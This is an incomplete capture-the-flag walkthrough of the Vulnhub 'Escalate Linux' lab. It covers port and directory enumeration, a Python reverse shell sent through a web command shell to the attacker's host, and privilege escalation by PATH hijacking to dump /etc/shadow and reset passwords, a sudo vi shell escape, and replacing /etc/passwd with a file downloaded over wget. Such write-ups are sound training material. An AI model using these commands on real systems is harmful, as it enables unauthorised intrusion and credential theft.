Escalate Linux < NOT FINISH >

Escalate Linux Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/EsLinux 192.168.1.114

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-20 06:58 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42718/udp6  mountd
|   100005  1,2,3      51050/udp   mountd
|   100005  1,2,3      53745/tcp6  mountd
|   100005  1,2,3      59791/tcp   mountd
|   100021  1,3,4      33361/tcp6  nlockmgr
|   100021  1,3,4      38815/tcp   nlockmgr
|   100021  1,3,4      43707/udp   nlockmgr
|   100021  1,3,4      57591/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     3 (RPC #100227)
MAC Address: 00:0C:29:2C:24:CB (VMware)
Service Info: Host: LINUX

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2020-05-20T06:58:42-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-20T10:58:42
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.82 seconds

dirb

dirb http://192.168.1.114/ -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 21 23:26:47 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/shell.php (CODE:200|SIZE:29)                                                                                      
                                                                                                                                         
-----------------
END_TIME: Thu May 21 23:26:52 2020
DOWNLOADED: 4612 - FOUND: 1

We can see here we have the shell.php, let's put it in the browser

we pass in the cmd and we can get a response from it

Reverse shell

We then can set up a listener at our machine by

nc -nlvp 4444

At the shell, we can use python to get a reverse shell from it

192.168.1.114/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got a shell and type

python -c 'import pty; pty.spawn("/bin/bash")'

Then we can start to perform Privilege Escalation.

Privilege Escalation

Method 1

We can escalate the privilege by exploiting the SUID rights of some shell file

type

find / -perm -u=s -type f 2>/dev/null

We can see there are 2 script files running. We first went to the user3 directory

We can see that a script file can be run to get root by any users. Type ./shell

Got root ! Easy !

Method 2

We can get a root shell by cracking the password.

Navigate to user5 directory and we can see the script file, after we run the file it returns list of directory indicates it is running the ls command

Navigate to /tmp

Then type

echo "cat /etc/shadow" > ls
chmod 777 ls
export PATH=/tmp:$PATH

Run the script, then we will get this

Copy the hash to a file and crack with john

We can see that we got the username root and password with 12345.

su into root and you will get root lmao.

Method 3

We know that user5 script can execute with root, so we can use echo and chpasswd to replace the existing password.

By doing that, navigate back to /tmp and type echo 'echo "user1:12345" | chpasswd" > ls , then chmod777 ls and export the path like we did just now

Then go back to user5 and run the script. Now we can su to user1 and type the password we replace just now which is 12345

Now we got into user1, type sudo -l

Then we can see it has sudo rights to run anything, we can go ahead and type sudo su to get

Method 4

Method 5

Using the PATH variable method at method 3, we can do the same for user8

After that login into user8 and type sudo -l

As we can see we have vi has sudo rights

sudo vi -c ':!/bin/sh' /dev/null

Then we will get root!

Method 6

If we type cat /etc/passwd , we got this and we can see user7 GID has root access

We can use the PATH variable that we use on user7

We can first copy the whole passwd to out machine then add a credentials.

But first we need to create a passwd for our new user, type

openssl passwd -1 -salt <salt> <password>

For example

openssl passwd -1 -salt wow damn

After that our machine we can add in the credentials like that

then create a SimpleHTTPServer using python by typing

python -m SimpleHTTPServer

At the target machine, navigate to /etc directory and type

wget -O passwd 192.168.1.113:8000/passwd

Then the transfer is successful, we can then su to the newly created credentials and type in the password we created.

Got root !